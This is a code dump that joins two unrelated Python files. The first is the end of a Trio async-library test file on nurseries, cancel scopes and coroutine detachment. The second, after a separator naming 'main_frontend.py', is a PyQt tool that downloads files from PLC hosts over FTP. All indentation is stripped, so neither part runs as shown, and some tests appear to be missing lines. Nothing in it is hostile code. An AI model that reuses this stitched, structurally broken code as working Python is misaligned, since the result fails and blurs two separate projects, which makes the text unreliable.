token.run_sync_soon(cb, i)
await wait_all_tasks_blocked()
assert counter[0] == COUNT
@pytest.mark.skipif(buggy_pypy_asyncgens, reason="PyPy 7.2 is buggy")
def test_TrioToken_run_sync_soon_late_crash():
# Crash after system nursery is closed -- easiest way to do that is
# from an async generator finalizer.
record = []
saved = []
async def agen():
token = _core.current_trio_token()
try:
yield 1
finally:
token.run_sync_soon(lambda: {}["nope"])
token.run_sync_soon(lambda: record.append("2nd ran"))
async def main():
saved.append(agen())
await saved[-1].asend(None)
record.append("main exiting")
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is KeyError
assert record == ["main exiting", "2nd ran"]
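# A "slow abort": the abort callback below cannot finish the cancellation
# synchronously, so it returns Abort.FAILED and instead arranges -- via
# run_sync_soon -- to reschedule the task itself once the Cancelled outcome
# has been captured.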
async def test_slow_abort_basic():
with _core.CancelScope() as scope:
scope.cancel()
with pytest.raises(_core.Cancelled):
task = _core.current_task()
token = _core.current_trio_token()
def slow_abort(raise_cancel):
result = outcome.capture(raise_cancel)
token.run_sync_soon(_core.reschedule, task, result)
return _core.Abort.FAILED
await _core.wait_task_rescheduled(slow_abort)
async def test_slow_abort_edge_cases():
record = []
async def slow_aborter():
task = _core.current_task()
token = _core.current_trio_token()
def slow_abort(raise_cancel):
record.append("abort-called")
result = outcome.capture(raise_cancel)
token.run_sync_soon(_core.reschedule, task, result)
return _core.Abort.FAILED
with pytest.raises(_core.Cancelled):
record.append("sleeping")
await _core.wait_task_rescheduled(slow_abort)
record.append("cancelled")
# blocking again, this time it's okay, because we're shielded
await _core.checkpoint()
record.append("done")
with _core.CancelScope() as outer1:
with _core.CancelScope() as outer2:
async with _core.open_nursery() as nursery:
# So we have a task blocked on an operation that can't be
# aborted immediately
nursery.start_soon(slow_aborter)
await wait_all_tasks_blocked()
assert record == ["sleeping"]
# And then we cancel it, so the abort callback gets run
outer1.cancel()
assert record == ["sleeping", "abort-called"]
# In fact that happens twice! (This used to cause the abort
# callback to be run twice)
outer2.cancel()
assert record == ["sleeping", "abort-called"]
# But then before the abort finishes, the task gets shielded!
nursery.cancel_scope.shield = True
# Now we wait for the task to finish...
# The cancellation was delivered, even though it was shielded
assert record == ["sleeping", "abort-called", "cancelled", "done"]
async def test_task_tree_introspection():
tasks = {}
nurseries = {}
async def parent(task_status=_core.TASK_STATUS_IGNORED):
tasks["parent"] = _core.current_task()
assert tasks["parent"].child_nurseries == []
async with _core.open_nursery() as nursery1:
async with _core.open_nursery() as nursery2:
assert tasks["parent"].child_nurseries == [nursery1, nursery2]
assert tasks["parent"].child_nurseries == []
async with _core.open_nursery() as nursery:
nurseries["parent"] = nursery
await nursery.start(child1)
# Upward links survive after tasks/nurseries exit
assert nurseries["parent"].parent_task is tasks["parent"]
assert tasks["child1"].parent_nursery is nurseries["parent"]
assert nurseries["child1"].parent_task is tasks["child1"]
assert tasks["child2"].parent_nursery is nurseries["child1"]
nursery = _core.current_task().parent_nursery
# Make sure that chaining eventually gives a nursery of None (and not,
# for example, an error)
while nursery is not None:
t = nursery.parent_task
nursery = t.parent_nursery
async def child2():
tasks["child2"] = _core.current_task()
assert tasks["parent"].child_nurseries == [nurseries["parent"]]
assert nurseries["parent"].child_tasks == frozenset({tasks["child1"]})
assert tasks["child1"].child_nurseries == [nurseries["child1"]]
assert nurseries["child1"].child_tasks == frozenset({tasks["child2"]})
assert tasks["child2"].child_nurseries == []
async def child1(task_status=_core.TASK_STATUS_IGNORED):
me = tasks["child1"] = _core.current_task()
assert me.parent_nursery.parent_task is tasks["parent"]
assert me.parent_nursery is not nurseries["parent"]
assert me.eventual_parent_nursery is nurseries["parent"]
task_status.started()
assert me.parent_nursery is nurseries["parent"]
assert me.eventual_parent_nursery is None
# Wait for the start() call to return and close its internal nursery, to
# ensure consistent results in child2:
await _core.wait_all_tasks_blocked()
async with _core.open_nursery() as nursery:
nurseries["child1"] = nursery
nursery.start_soon(child2)
async with _core.open_nursery() as nursery:
nursery.start_soon(parent)
# There are no pending starts, so no one should have a non-None
# eventual_parent_nursery
for task in tasks.values():
assert task.eventual_parent_nursery is None
async def test_nursery_closure():
async def child1(nursery):
# We can add new tasks to the nursery even after entering __aexit__,
# so long as there are still tasks running
nursery.start_soon(child2)
async def child2():
pass
async with _core.open_nursery() as nursery:
nursery.start_soon(child1, nursery)
# But once we've left __aexit__, the nursery is closed
with pytest.raises(RuntimeError):
nursery.start_soon(child2)
async def test_spawn_name():
async def func1(expected):
task = _core.current_task()
assert expected in task.name
async def func2(): # pragma: no cover
pass
async with _core.open_nursery() as nursery:
for spawn_fn in [nursery.start_soon, _core.spawn_system_task]:
spawn_fn(func1, "func1")
spawn_fn(func1, "func2", name=func2)
spawn_fn(func1, "func3", name="func3")
spawn_fn(functools.partial(func1, "func1"))
spawn_fn(func1, "object", name=object())
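# current_effective_deadline() reports the soonest deadline among the
# enclosing unshielded cancel scopes: inf when there is no deadline at all,
# -inf once an enclosing unshielded scope is cancelled, and shielding a scope
# hides any deadlines and cancellations outside it.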
async def test_current_effective_deadline(mock_clock):
assert _core.current_effective_deadline() == inf
with _core.CancelScope(deadline=5) as scope1:
with _core.CancelScope(deadline=10) as scope2:
assert _core.current_effective_deadline() == 5
scope2.deadline = 3
assert _core.current_effective_deadline() == 3
scope2.deadline = 10
assert _core.current_effective_deadline() == 5
scope2.shield = True
assert _core.current_effective_deadline() == 10
scope2.shield = False
assert _core.current_effective_deadline() == 5
scope1.cancel()
assert _core.current_effective_deadline() == -inf
scope2.shield = True
assert _core.current_effective_deadline() == 10
assert _core.current_effective_deadline() == -inf
assert _core.current_effective_deadline() == inf
def test_nice_error_on_bad_calls_to_run_or_spawn():
def bad_call_run(*args):
_core.run(*args)
def bad_call_spawn(*args):
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(*args)
_core.run(main)
for bad_call in bad_call_run, bad_call_spawn:
async def f(): # pragma: no cover
pass
with pytest.raises(TypeError, match="expecting an async function"):
bad_call(f())
async def async_gen(arg): # pragma: no cover
yield arg
with pytest.raises(
TypeError, match="expected an async function but got an async generator"
):
bad_call(async_gen, 0)
def test_calling_asyncio_function_gives_nice_error():
async def child_xyzzy():
import asyncio
await asyncio.Future()
async def misguided():
await child_xyzzy()
with pytest.raises(TypeError) as excinfo:
_core.run(misguided)
assert "asyncio" in str(excinfo.value)
# The traceback should point to the location of the foreign await
assert any( # pragma: no branch
entry.name == "child_xyzzy" for entry in excinfo.traceback
)
async def test_asyncio_function_inside_nursery_does_not_explode():
# Regression test for https://github.com/python-trio/trio/issues/552
with pytest.raises(TypeError) as excinfo:
async with _core.open_nursery() as nursery:
import asyncio
nursery.start_soon(sleep_forever)
await asyncio.Future()
assert "asyncio" in str(excinfo.value)
async def test_trivial_yields():
with assert_checkpoints():
await _core.checkpoint()
with assert_checkpoints():
await _core.checkpoint_if_cancelled()
await _core.cancel_shielded_checkpoint()
with assert_checkpoints():
async with _core.open_nursery():
pass
with _core.CancelScope() as cancel_scope:
cancel_scope.cancel()
with pytest.raises(_core.MultiError) as excinfo:
async with _core.open_nursery():
raise KeyError
assert len(excinfo.value.exceptions) == 2
assert {type(e) for e in excinfo.value.exceptions} == {
KeyError,
_core.Cancelled,
}
async def test_nursery_start(autojump_clock):
async def no_args(): # pragma: no cover
pass
# Errors in calling convention get raised immediately from start
async with _core.open_nursery() as nursery:
with pytest.raises(TypeError):
await nursery.start(no_args)
async def sleep_then_start(seconds, *, task_status=_core.TASK_STATUS_IGNORED):
repr(task_status) # smoke test
await sleep(seconds)
task_status.started(seconds)
await sleep(seconds)
# Basic happy-path check: start waits for the task to call started(), then
# returns, passes back the value, and the given nursery then waits for it
# to exit.
for seconds in [1, 2]:
async with _core.open_nursery() as nursery:
assert len(nursery.child_tasks) == 0
t0 = _core.current_time()
assert await nursery.start(sleep_then_start, seconds) == seconds
assert _core.current_time() - t0 == seconds
assert len(nursery.child_tasks) == 1
assert _core.current_time() - t0 == 2 * seconds
# Make sure TASK_STATUS_IGNORED works so task function can be called
# directly
t0 = _core.current_time()
await sleep_then_start(3)
assert _core.current_time() - t0 == 2 * 3
# calling started twice
async def double_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started()
with pytest.raises(RuntimeError):
task_status.started()
async with _core.open_nursery() as nursery:
await nursery.start(double_started)
# child crashes before calling started -> error comes out of .start()
async def raise_keyerror(task_status=_core.TASK_STATUS_IGNORED):
raise KeyError("oops")
async with _core.open_nursery() as nursery:
with pytest.raises(KeyError):
await nursery.start(raise_keyerror)
# child exiting cleanly before calling started -> triggers a RuntimeError
async def nothing(task_status=_core.TASK_STATUS_IGNORED):
return
async with _core.open_nursery() as nursery:
with pytest.raises(RuntimeError) as excinfo:
await nursery.start(nothing)
assert "exited without calling" in str(excinfo.value)
# if the call to start() is cancelled, then the call to started() does
# nothing -- the child keeps executing under start(). The value it passed
# is ignored; start() raises Cancelled.
async def just_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started("hi")
async with _core.open_nursery() as nursery:
with _core.CancelScope() as cs:
cs.cancel()
with pytest.raises(_core.Cancelled):
await nursery.start(just_started)
# and if after the no-op started(), the child crashes, the error comes out
# of start()
async def raise_keyerror_after_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started()
raise KeyError("whoopsiedaisy")
async with _core.open_nursery() as nursery:
with _core.CancelScope() as cs:
cs.cancel()
with pytest.raises(_core.MultiError) as excinfo:
await nursery.start(raise_keyerror_after_started)
assert {type(e) for e in excinfo.value.exceptions} == {
_core.Cancelled,
KeyError,
}
# trying to start in a closed nursery raises an error immediately
async with _core.open_nursery() as closed_nursery:
pass
t0 = _core.current_time()
with pytest.raises(RuntimeError):
await closed_nursery.start(sleep_then_start, 7)
assert _core.current_time() == t0
async def test_task_nursery_stack():
task = _core.current_task()
assert task._child_nurseries == []
async with _core.open_nursery() as nursery1:
assert task._child_nurseries == [nursery1]
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery2:
assert task._child_nurseries == [nursery1, nursery2]
raise KeyError
assert task._child_nurseries == [nursery1]
assert task._child_nurseries == []
async def test_nursery_start_with_cancelled_nursery():
# This function isn't testing task_status, it's using task_status as a
# convenient way to get a nursery that we can test spawning stuff into.
async def setup_nursery(task_status=_core.TASK_STATUS_IGNORED):
async with _core.open_nursery() as nursery:
task_status.started(nursery)
await sleep_forever()
# Calls started() while children are asleep, so we can make sure
# that the cancellation machinery notices and aborts when a sleeping task
# is moved into a cancelled scope.
async def sleeping_children(fn, *, task_status=_core.TASK_STATUS_IGNORED):
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_forever)
nursery.start_soon(sleep_forever)
await wait_all_tasks_blocked()
fn()
task_status.started()
# Cancelling the setup_nursery just *before* calling started()
async with _core.open_nursery() as nursery:
target_nursery = await nursery.start(setup_nursery)
await target_nursery.start(
sleeping_children, target_nursery.cancel_scope.cancel
)
# Cancelling the setup_nursery just *after* calling started()
async with _core.open_nursery() as nursery:
target_nursery = await nursery.start(setup_nursery)
await target_nursery.start(sleeping_children, lambda: None)
target_nursery.cancel_scope.cancel()
async def test_nursery_start_keeps_nursery_open(autojump_clock):
async def sleep_a_bit(task_status=_core.TASK_STATUS_IGNORED):
await sleep(2)
task_status.started()
await sleep(3)
async with _core.open_nursery() as nursery1:
t0 = _core.current_time()
async with _core.open_nursery() as nursery2:
# Start the 'start' call running in the background
nursery1.start_soon(nursery2.start, sleep_a_bit)
# Sleep a bit
await sleep(1)
# Start another one.
nursery1.start_soon(nursery2.start, sleep_a_bit)
# Then exit this nursery. At this point, there are no tasks
# present in this nursery -- the only thing keeping it open is
# that the tasks will be placed into it soon, when they call
# started().
assert _core.current_time() - t0 == 6
# Check that it still works even if the task that the nursery is waiting
# for ends up crashing, and never actually enters the nursery.
async def sleep_then_crash(task_status=_core.TASK_STATUS_IGNORED):
await sleep(7)
raise KeyError
async def start_sleep_then_crash(nursery):
with pytest.raises(KeyError):
await nursery.start(sleep_then_crash)
async with _core.open_nursery() as nursery1:
t0 = _core.current_time()
async with _core.open_nursery() as nursery2:
nursery1.start_soon(start_sleep_then_crash, nursery2)
await wait_all_tasks_blocked()
assert _core.current_time() - t0 == 7
async def test_nursery_explicit_exception():
with pytest.raises(KeyError):
async with _core.open_nursery():
raise KeyError()
async def test_nursery_stop_iteration():
async def fail():
raise ValueError
try:
async with _core.open_nursery() as nursery:
nursery.start_soon(fail)
raise StopIteration
except _core.MultiError as e:
assert tuple(map(type, e.exceptions)) == (StopIteration, ValueError)
async def test_nursery_stop_async_iteration():
class it:
def __init__(self, count):
self.count = count
self.val = 0
async def __anext__(self):
await sleep(0)
val = self.val
if val >= self.count:
raise StopAsyncIteration
self.val += 1
return val
class async_zip:
def __init__(self, *largs):
self.nexts = [obj.__anext__ for obj in largs]
async def _accumulate(self, f, items, i):
items[i] = await f()
def __aiter__(self):
return self
async def __anext__(self):
nexts = self.nexts
items = [None] * len(nexts)
got_stop = False
def handle(exc):
nonlocal got_stop
if isinstance(exc, StopAsyncIteration):
got_stop = True
return None
else: # pragma: no cover
return exc
with _core.MultiError.catch(handle):
async with _core.open_nursery() as nursery:
for i, f in enumerate(nexts):
nursery.start_soon(self._accumulate, f, items, i)
if got_stop:
raise StopAsyncIteration
return items
result = []
async for vals in async_zip(it(4), it(2)):
result.append(vals)
assert result == [[0, 0], [1, 1]]
async def test_traceback_frame_removal():
async def my_child_task():
raise KeyError()
try:
# Trick: For now cancel/nursery scopes still leave a bunch of tb gunk
# behind. But if there's a MultiError, they leave it on the MultiError,
# which lets us get a clean look at the KeyError itself. Someday I
# guess this will always be a MultiError (#611), but for now we can
# force it by raising two exceptions.
async with _core.open_nursery() as nursery:
nursery.start_soon(my_child_task)
nursery.start_soon(my_child_task)
except _core.MultiError as exc:
first_exc = exc.exceptions[0]
assert isinstance(first_exc, KeyError)
# The top frame in the exception traceback should be inside the child
# task, not trio/contextvars internals. And there's only one frame
# inside the child task, so this will also detect if our frame-removal
# is too eager.
frame = first_exc.__traceback__.tb_frame
assert frame.f_code is my_child_task.__code__
def test_contextvar_support():
var = contextvars.ContextVar("test")
var.set("before")
assert var.get() == "before"
async def inner():
task = _core.current_task()
assert task.context.get(var) == "before"
assert var.get() == "before"
var.set("after")
assert var.get() == "after"
assert var in task.context
assert task.context.get(var) == "after"
_core.run(inner)
assert var.get() == "before"
async def test_contextvar_multitask():
var = contextvars.ContextVar("test", default="hmmm")
async def t1():
assert var.get() == "hmmm"
var.set("hmmmm")
assert var.get() == "hmmmm"
async def t2():
assert var.get() == "hmmmm"
async with _core.open_nursery() as n:
n.start_soon(t1)
await wait_all_tasks_blocked()
assert var.get() == "hmmm"
var.set("hmmmm")
n.start_soon(t2)
await wait_all_tasks_blocked()
def test_system_task_contexts():
cvar = contextvars.ContextVar("qwilfish")
cvar.set("water")
async def system_task():
assert cvar.get() == "water"
async def regular_task():
assert cvar.get() == "poison"
async def inner():
async with _core.open_nursery() as nursery:
cvar.set("poison")
nursery.start_soon(regular_task)
_core.spawn_system_task(system_task)
await wait_all_tasks_blocked()
_core.run(inner)
def test_Nursery_init():
with pytest.raises(TypeError):
_core._run.Nursery(None, None)
async def test_Nursery_private_init():
# context manager creation should not raise
async with _core.open_nursery() as nursery:
assert False == nursery._closed
def test_Nursery_subclass():
with pytest.raises(TypeError):
class Subclass(_core._run.Nursery):
pass
def test_Cancelled_init():
with pytest.raises(TypeError):
raise _core.Cancelled
with pytest.raises(TypeError):
_core.Cancelled()
# private constructor should not raise
_core.Cancelled._create()
def test_Cancelled_str():
cancelled = _core.Cancelled._create()
assert str(cancelled) == "Cancelled"
def test_Cancelled_subclass():
with pytest.raises(TypeError):
class Subclass(_core.Cancelled):
pass
def test_CancelScope_subclass():
with pytest.raises(TypeError):
class Subclass(_core.CancelScope):
pass
def test_sniffio_integration():
with pytest.raises(sniffio.AsyncLibraryNotFoundError):
sniffio.current_async_library()
async def check_inside_trio():
assert sniffio.current_async_library() == "trio"
_core.run(check_inside_trio)
with pytest.raises(sniffio.AsyncLibraryNotFoundError):
sniffio.current_async_library()
async def test_Task_custom_sleep_data():
task = _core.current_task()
assert task.custom_sleep_data is None
task.custom_sleep_data = 1
assert task.custom_sleep_data == 1
await _core.checkpoint()
assert task.custom_sleep_data is None
@types.coroutine
def async_yield(value):
yield value
async def test_permanently_detach_coroutine_object():
task = None
pdco_outcome = None
async def detachable_coroutine(task_outcome, yield_value):
await sleep(0)
nonlocal task, pdco_outcome
task = _core.current_task()
pdco_outcome = await outcome.acapture(
_core.permanently_detach_coroutine_object, task_outcome
)
await async_yield(yield_value)
async with _core.open_nursery() as nursery:
nursery.start_soon(detachable_coroutine, outcome.Value(None), "I'm free!")
# If we get here then Trio thinks the task has exited... but the coroutine
# is still iterable
assert pdco_outcome is None
assert task.coro.send("be free!") == "I'm free!"
assert pdco_outcome == outcome.Value("be free!")
with pytest.raises(StopIteration):
task.coro.send(None)
# Check the exception paths too
task = None
pdco_outcome = None
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery:
nursery.start_soon(detachable_coroutine, outcome.Error(KeyError()), "uh oh")
throw_in = ValueError()
assert task.coro.throw(throw_in) == "uh oh"
assert pdco_outcome == outcome.Error(throw_in)
with pytest.raises(StopIteration):
task.coro.send(None)
async def bad_detach():
async with _core.open_nursery():
with pytest.raises(RuntimeError) as excinfo:
await _core.permanently_detach_coroutine_object(outcome.Value(None))
assert "open nurser" in str(excinfo.value)
async with _core.open_nursery() as nursery:
nursery.start_soon(bad_detach)
async def test_detach_and_reattach_coroutine_object():
unrelated_task = None
task = None
async def unrelated_coroutine():
nonlocal unrelated_task
unrelated_task = _core.current_task()
async def reattachable_coroutine():
await sleep(0)
nonlocal task
task = _core.current_task()
def abort_fn(_): # pragma: no cover
return _core.Abort.FAILED
got = await _core.temporarily_detach_coroutine_object(abort_fn)
assert got == "not trio!"
await async_yield(1)
await async_yield(2)
with pytest.raises(RuntimeError) as excinfo:
await _core.reattach_detached_coroutine_object(unrelated_task, None)
assert "does not match" in str(excinfo.value)
await _core.reattach_detached_coroutine_object(task, "byebye")
await sleep(0)
async with _core.open_nursery() as nursery:
nursery.start_soon(unrelated_coroutine)
nursery.start_soon(reattachable_coroutine)
await wait_all_tasks_blocked()
assert unrelated_task is not None
assert task is not None
# Okay, it's detached. Here's our coroutine runner:
assert task.coro.send("not trio!") == 1
assert task.coro.send(None) == 2
assert task.coro.send(None) == "byebye"
# Now it's been reattached, and we can leave the nursery
async def test_detached_coroutine_cancellation():
abort_fn_called = False
task = None
async def reattachable_coroutine():
await sleep(0)
nonlocal task
task = _core.current_task()
def abort_fn(_):
nonlocal abort_fn_called
abort_fn_called = True
return _core.Abort.FAILED
await _core.temporarily_detach_coroutine_object(abort_fn)
await _core.reattach_detached_coroutine_object(task, None)
with pytest.raises(_core.Cancelled):
await sleep(0)
async with _core.open_nursery() as nursery:
nursery.start_soon(reattachable_coroutine)
await wait_all_tasks_blocked()
assert task is not None
nursery.cancel_scope.cancel()
task.coro.send(None)
assert abort_fn_called
def test_async_function_implemented_in_C():
# These used to crash because we'd try to mutate the coroutine object's
# cr_frame, but C functions don't have Python frames.
async def agen_fn(record):
assert not _core.currently_ki_protected()
record.append("the generator ran")
yield
run_record = []
agen = agen_fn(run_record)
_core.run(agen.__anext__)
assert run_record == ["the generator ran"]
async def main():
start_soon_record = []
agen = agen_fn(start_soon_record)
async with _core.open_nursery() as nursery:
nursery.start_soon(agen.__anext__)
assert start_soon_record == ["the generator ran"]
_core.run(main)
async def test_very_deep_cancel_scope_nesting():
# This used to crash with a RecursionError in CancelStatus.recalculate
with ExitStack() as exit_stack:
outermost_scope = _core.CancelScope()
exit_stack.enter_context(outermost_scope)
for _ in range(5000):
exit_stack.enter_context(_core.CancelScope())
outermost_scope.cancel()
async def test_cancel_scope_deadline_duplicates():
# This exercises an assert in Deadlines._prune, by intentionally creating
# duplicate entries in the deadline heap.
now = _core.current_time()
with _core.CancelScope() as cscope:
for _ in range(DEADLINE_HEAP_MIN_PRUNE_THRESHOLD * 2):
cscope.deadline = now + 9998
cscope.deadline = now + 9999
await sleep(0.01)
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_simple_cancel_scope_usage_doesnt_create_cyclic_garbage():
# https://github.com/python-trio/trio/issues/1770
gc.collect()
async def do_a_cancel():
with _core.CancelScope() as cscope:
cscope.cancel()
await sleep_forever()
old_flags = gc.get_debug()
try:
gc.collect()
gc.set_debug(gc.DEBUG_SAVEALL)
await do_a_cancel()
await do_a_cancel()
async with _core.open_nursery() as nursery:
nursery.start_soon(do_a_cancel)
gc.collect()
assert not gc.garbage
finally:
gc.set_debug(old_flags)
gc.garbage.clear()
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_nursery_cancel_doesnt_create_cyclic_garbage():
# https://github.com/python-trio/trio/issues/1770#issuecomment-730229423
gc.collect()
old_flags = gc.get_debug()
try:
for i in range(3):
async with _core.open_nursery() as nursery:
gc.collect()
gc.set_debug(gc.DEBUG_LEAK)
nursery.cancel_scope.cancel()
gc.collect()
gc.set_debug(0)
assert not gc.garbage
finally:
gc.set_debug(old_flags)
gc.garbage.clear()
|
main_frontend.py
|
import datetime
import ftplib
import os
import sys
from threading import Thread
from typing import List
import logging
from PyQt5.QtCore import QDate, pyqtSignal, QObject
from PyQt5.QtWidgets import QApplication, QMainWindow, QCheckBox, QMessageBox, QWidget, QVBoxLayout
from SPSLib import SPSLib, SPSConnectionException
from frontend.ConfigManager import ConfigManager
from frontend.mainwindow import Ui_MainWindow
config_file_path = '../User/collection.conf'.replace('~', 'c:\\Users\\' + os.getlogin())
class Main(QObject):
window = None
ui = None
config = None
checkBoxes: List[QCheckBox] = []
showDialogSignal = pyqtSignal(str, str)
## Constructor
# Loads configuration and initializes superclass
def __init__(self):
super(Main, self).__init__()
self.ui = None
self.config = ConfigManager(config_file_path)
logging.basicConfig(filename=self.config.log_path, level=logging.INFO,
format='%(asctime)s: %(levelname)s : %(message)s')
logging.info("Starting...")
## Helper for creating a SPS object. Uses default username, password and settings
# @param host the hostname (or IP address) of the SPS to be connected to
# @return the SPS object
def SPSFactory(self, host):
return SPSLib(host, self.config.SPSuser, self.config.SPSpassword, numretries=3,
retrydelay=1,
default_destination=self.config.downloaddestination) # Create an SPS client that will try to connect 3 times waiting 1 second on each failed attempt
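    ## Example usage (sketch only; '192.168.0.10' is a hypothetical address, download_files_for_day is used below):
    #   sps = self.SPSFactory('192.168.0.10')
    #   sps.download_files_for_day(datetime.date.today())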
## Opens the configuration in Notepad so the user can edit it.
def open_conf_file(self):
# Thread(target=os.system, args=("notepad " + config_file_path,)).start()
os.system("notepad " + config_file_path)
QMessageBox.about(self.window, "Notice", "Please Restart The Program For Changes To Take Effect")
def open_log_file(self):
Thread(target=os.system, args=("notepad " + self.config.log_path,)).start()
# os.system("notepad " + config_file_path)
# QMessageBox.about(self.window, "Notice", "Please Restart The Program For Changes To Take Effect")
## Reloads the configuration file
# Not yet implemented
def reload_conf_file(self):
pass
    ## Installs the scheduled task on the user's PC
# Not yet implemented
def install_scheduled_task(self):
pass # TODO Implement this...
## Threaded option for download for day
def threadDownloadForDay(self):
Thread(target=self.downloadFilesForDay).start()
## Threaded option for download for month
def threadDownloadForMonth(self):
Thread(target=self.downloadFilesForMonth).start()
## Threaded option for download for year
def threadDownloadForYear(self):
Thread(target=self.downloadFilesForYear).start()
    ## Threaded function tied to a signal for showing a dialog with the given information
# @param title The title of the dialog
# @param message The message of the dialog
def showDialog(self, title, message):
QMessageBox.about(self.window, title, message)
## Download all files for a given day
def downloadFilesForDay(self):
logging.info("Initiated Download For Day")
selected_hosts = self.getSelectedHosts()
        if len(selected_hosts) == 0:
self.showDialogSignal.emit("Error!", "No PLC Selected")
return
self.setProgressBarEnabled(True)
self.setAllButtonsEnabled(False)
for host in selected_hosts:
try:
sps = self.SPSFactory(host)
qdate = self.ui.daySelector.date()
dt = datetime.date(qdate.year(), qdate.month(), qdate.day())
sps.download_files_for_day(dt)
except SPSConnectionException:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!", "Error Connecting To SPS With Address " + host)
logging.error("Error Connecting To SPS With Address " + host)
self.setProgressBarEnabled(True)
except ftplib.all_errors:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!",
"An FTP Error Occurred Communicating With SPS With Address " + host + ". Make Sure The Files You Are Looking For Exist")
                logging.error("An FTP Error Occurred Communicating With SPS With Address " + host)
self.setProgressBarEnabled(True)
self.showDialogSignal.emit("Done!", "Download Process Is Complete")
logging.info("Download Process Is Complete")
self.setProgressBarEnabled(False)
self.setAllButtonsEnabled(True)
## Download all files for a given month
def downloadFilesForMonth(self):
logging.info("Initiated Download For Month")
selected_hosts = self.getSelectedHosts()
        if len(selected_hosts) == 0:
self.showDialogSignal.emit("Error!", "No PLC Selected")
return
self.setProgressBarEnabled(True)
self.setAllButtonsEnabled(False)
for host in selected_hosts:
try:
sps = self.SPSFactory(host)
qdate = self.ui.monthSelector.date()
dt = datetime.date(qdate.year(), qdate.month(), qdate.day())
sps.download_files_for_month(dt)
except SPSConnectionException:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!", "Error Connecting To SPS With Address " + host)
logging.error("Error Connecting To SPS With Address " + host)
self.setProgressBarEnabled(True)
except ftplib.all_errors:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!",
"An FTP Error Occurred Communicating With SPS With Address " + host + ". Make Sure The Files You Are Looking For Exist")
                logging.error("An FTP Error Occurred Communicating With SPS With Address " + host)
self.setProgressBarEnabled(True)
self.showDialogSignal.emit("Done!", "Download Process Is Complete")
logging.info("Download Process Is Complete")
self.setProgressBarEnabled(False)
self.setAllButtonsEnabled(True)
## Download all files for a given year
def downloadFilesForYear(self):
logging.info("Initiated Download For Year")
selected_hosts = self.getSelectedHosts()
        if len(selected_hosts) == 0:
self.showDialogSignal.emit("Error!", "No PLC Selected")
return
self.setProgressBarEnabled(True)
self.setAllButtonsEnabled(False)
for host in selected_hosts:
try:
sps = self.SPSFactory(host)
qdate = self.ui.yearSelector.date()
year = qdate.year()
                for i in range(1, 13):
dt = datetime.date(year, i, 1)
try:
sps.download_files_for_month(dt)
except ftplib.all_errors:
continue
except SPSConnectionException:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!", "Error Connecting To SPS With Address " + host)
logging.error("Error Connecting To SPS With Address " + host)
self.setProgressBarEnabled(True)
except:
self.setProgressBarEnabled(False)
self.showDialogSignal.emit("Error!",
"An Unknown Error Occurred Communicating With SPS With Address " + host)
logging.error("An Unknown Error Occurred Communicating With SPS With Address " + host)
self.setProgressBarEnabled(True)
self.showDialogSignal.emit("Done!", "Download Process Is Complete")
logging.info("Download Process Is Complete")
self.setProgressBarEnabled(False)
self.setAllButtonsEnabled(True)
## Iterate through the list of checkboxes and get a list of all those selected
# @return An array of strings containing the addresses
def getSelectedHosts(self):
selected_addresses: List[str] = []
for checkBox in self.checkBoxes:
if checkBox.isChecked():
selected_addresses.append(checkBox.text()) # TODO FIXME this is bad
return selected_addresses
## Set all checkboxes' checked values to a given value
# @param selected Boolean to set the checked values to
def setCheckedAllHosts(self, selected: bool):
for checkBox in self.checkBoxes:
checkBox.setChecked(selected)
## Check all the host check boxes
def selectAllHosts(self):
self.setCheckedAllHosts(True)
## Uncheck all the host check boxes
def disselectAllHosts(self):
self.setCheckedAllHosts(False)
## Set the enabled status of the master progress bar. Enabled makes it pulsing and green. Disabled makes it greyed out
    # @param enabled boolean indicating whether the progress bar is enabled
def setProgressBarEnabled(self, enabled: bool):
if enabled:
self.ui.masterProgressBar.setRange(0, 0)
self.ui.masterProgressBar.setEnabled(True)
else:
self.ui.masterProgressBar.setRange(0, 10)
self.ui.masterProgressBar.setDisabled(True)
## Sets the enabled status of all the buttons that can create a thread. Used to prevent multiple async downloads
    # @param enabled boolean indicating whether the buttons are enabled
def setAllButtonsEnabled(self, enabled):
self.ui.pushButtonDownloadForDay.setEnabled(enabled)
self.ui.pushButtonDownloadForMonth.setEnabled(enabled)
self.ui.pushButtonDownloadForYear.setEnabled(enabled)
self.ui.pushButtonDisselectAll.setEnabled(enabled)
self.ui.pushButtonSelectAll.setEnabled(enabled)
for checkbox in self.checkBoxes:
checkbox.setEnabled(enabled)
## Set up the UI elements and do any needed config setup before starting the UI
def setup_ui(self):
logging.debug("Setting Up UI")
self.ui.pushButtonDownloadForDay.clicked.connect(self.threadDownloadForDay)
self.ui.pushButtonDownloadForMonth.clicked.connect(self.threadDownloadForMonth)
self.ui.pushButtonDownloadForYear.clicked.connect(self.threadDownloadForYear)
self.ui.pushButtonSelectAll.clicked.connect(self.selectAllHosts)
self.ui.pushButtonDisselectAll.clicked.connect(self.disselectAllHosts)
self.ui.daySelector.setDate(QDate(datetime.datetime.today()))
self.ui.monthSelector.setDate(QDate(datetime.datetime.today()))
self.ui.yearSelector.setDate(QDate(datetime.datetime.today()))
self.ui.openConfFileButton.triggered.connect(self.open_conf_file)
self.ui.openLogFileButton.triggered.connect(self.open_log_file)
self.ui.actionQuit.triggered.connect(exit)
self.checkBoxes.clear()
self.ui.scrollArea.setWidgetResizable(True)
scroll_content = QWidget(self.ui.scrollArea)
scroll_layout = QVBoxLayout(scroll_content)
scroll_content.setLayout(scroll_layout)
for address in self.config.SPSaddresses:
ccb = QCheckBox(scroll_content)
ccb.setObjectName(address.replace('.', '_') + "Checkbox")
ccb.setText(address)
scroll_layout.addWidget(ccb)
self.checkBoxes.append(ccb)
self.ui.scrollArea.setWidget(scroll_content)
